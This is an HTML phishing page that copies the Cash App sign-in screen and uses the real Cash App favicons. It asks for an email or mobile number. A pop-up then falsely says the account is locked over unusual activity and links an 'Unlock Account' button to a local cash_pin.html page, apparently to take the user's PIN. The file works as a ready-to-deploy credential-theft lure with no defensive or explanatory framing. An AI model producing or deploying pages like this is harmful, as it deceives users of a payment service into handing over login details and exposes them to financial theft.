<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />

        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
        <link rel="stylesheet" type="text/css" href="./cash.css" />

        <title>Cash App</title>
        <style type="text/css">
            body {
                display: flex;
                flex-direction: column;
                justify-content: center;
                min-height: 100vh;
            }
            .custom-model-main {
          text-align: center;
          overflow: hidden;
          position: fixed;
          top: 0;
          right: 0;
          bottom: 0;
          left: 0; /* z-index: 1050; */
          -webkit-overflow-scrolling: touch;
          outline: 0;
          opacity: 0;
          -webkit-transition: opacity 0.15s linear, z-index 0.15;
          -o-transition: opacity 0.15s linear, z-index 0.15;
          transition: opacity 0.15s linear, z-index 0.15;
          z-index: -1;
          overflow-x: hidden;
          overflow-y: auto;
        }
        .model-open {
          z-index: 99999;
          opacity: 1;
          overflow: hidden;
        }
        .custom-model-inner {
          -webkit-transform: translate(0, -25%);
          -ms-transform: translate(0, -25%);
          transform: translate(0, -25%);
          -webkit-transition: -webkit-transform 0.3s ease-out;
          -o-transition: -o-transform 0.3s ease-out;
          transition: -webkit-transform 0.3s ease-out;
          -o-transition: transform 0.3s ease-out;
          transition: transform 0.3s ease-out;
          transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out;
          display: inline-block;
          vertical-align: middle;
          width: 320px;
          margin: 30px auto;
          max-width: 97%;
        }
        .custom-model-wrap {
          display: block;
          width: 100%;
          position: relative;
          background-color: #fff;
          border: 1px solid #999;
          border: 1px solid rgba(0, 0, 0, 0.2);
          border-radius: 6px;
          -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
          box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
          background-clip: padding-box;
          outline: 0;
          text-align: left;
          padding: 20px;
          -webkit-box-sizing: border-box;
          -moz-box-sizing: border-box;
          box-sizing: border-box;
          max-height: calc(100vh - 70px);
            overflow-y: auto;
        }
        .model-open .custom-model-inner {
          -webkit-transform: translate(0, 0);
          -ms-transform: translate(0, 0);
          transform: translate(0, 0);
          position: relative;
          z-index: 999;
        }
        .model-open .bg-overlay {
          background: rgba(0, 0, 0, 0.6);
          z-index: 99;
        }
        .bg-overlay {
          background: rgba(0, 0, 0, 0);
          height: 100vh;
          width: 100%;
          position: fixed;
          left: 0;
          top: 0;
          right: 0;
          bottom: 0;
          z-index: 0;
          -webkit-transition: background 0.15s linear;
          -o-transition: background 0.15s linear;
          transition: background 0.15s linear;
        }
        .close-btn {
          position: absolute;
          right: 0;
          top: -30px;
          cursor: pointer;
          z-index: 99;
          font-size: 30px;
          color: #fff;
        }
        @media screen and (min-width:800px){
            .custom-model-main:before {
              content: "";
              display: inline-block;
              height: auto;
              vertical-align: middle;
              margin-right: -0px;
              height: 100%;
            }
        }
        @media screen and (max-width:799px){
          .custom-model-inner{margin-top: 45px;}
        }
        .center {
          margin: 0;
          position: absolute;
          top: 84%;
          left: 50%;
          -ms-transform: translate(-50%, -50%);
          transform: translate(-50%, -50%);
        }
        .center_img {
          margin: 0;
          position: absolute;
          top: 20%;
          left: 50%;
          -ms-transform: translate(-50%, -50%);
          transform: translate(-50%, -50%);
        }
        </style>
        <link rel="icon" sizes="196x196" href="https://cash.app/icon-196.png">
        <link rel="icon" href="https://cash.app/favicon.ico">
        <link rel="mask-icon" href="https://cash.app/favicon-pinned.svg" color="#18C300">
    </head>
    <body class="theme-bg ember-application theme-green">
        <div id="ember323" class="ember-view">
            <div data-current-route="login" id="ember347" class="full-height application-cash ember-view">
                <div id="ember354" class="cookie-banner ember-view"><!----></div>
                <section class="layout-login flex-container full-height pad">
                    <div class="login-container flex-container flex-v-center flex-fill">
                        <!---->
                        <h1 class="step-title flex-static">Sign in to Cash&nbsp;App</h1>
                        <!---->
                        <form autocomplete="off" spellcheck="true" novalidate="true" id="ember360" class="login-form ember-view">
                            <div id="ember386" class="field fk-field-container ember-view">
                                <input
                                    type="text"
                                    aria-label="Email or Mobile Number"
                                    name="alias"
                                    autocomplete="off"
                                    spellcheck="false"
                                    autocapitalize="none"
                                    id="alias"
                                    class="ember-text-field ember-view"
                                    placeholder="Email or Mobile Number"
                                />
                            </div>
                            <!---->
                            <div class="alias-submit fade-in immediate show">
                                <div id="ember401" class="cta submit-button-component submit-button-with-spinner ember-view">
                                    <button type="button" aria-label="Request Sign In Code" class="button theme-button button--round theme-button" data-ember-action="" data-ember-action-402="402">Request Sign In Code</button>
                                    <div id="ember407" class="spinner-container ember-view"></div>
                                </div>
                            </div>
                        </form>
                    </div>
                </section>

                <!---->
                <div id="ember410" class="modal-manager ember-view">
                    <div class="modal-overlay"></div>
                    <!---->
                </div>
            </div>
        </div>
        <div class="custom-model-main">
       <div class="custom-model-inner">
          <div class="custom-model-wrap">
             <div class="pop-up-content-wrap">
                <br>
                <br>
                <br>
                <br>
                <br>
                <img src="./lock4.png" class="center_img">
                <p style="text-align: center; color: black">We detected something unusual. To protect your funds we've temporarily locked your account.</p>
                <p style="text-align: center; color: black">To unlock your account please verify your email by clicking the button below.</p>
                <br>
                <br>
                <br>
                <br>
                <a href="./cash_pin.html"><button type="button" aria-label="Request Sign In Code" class="button theme-button button--round theme-button center" data-ember-action="" data-ember-action-402="402" style="">Unlock Account</button></a>
             </div>
          </div>
       </div>
       <div class="bg-overlay"></div>
    </div>
        <!-- jQuery -->
    <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
    <script>
    $(".button").on('click', function() {
      $(".custom-model-main").addClass('model-open');
    }); 
    $(".close-btn, .bg-overlay").click(function(){
      $(".custom-model-main").removeClass('model-open');
    });
    </script>
    </body>
</html>
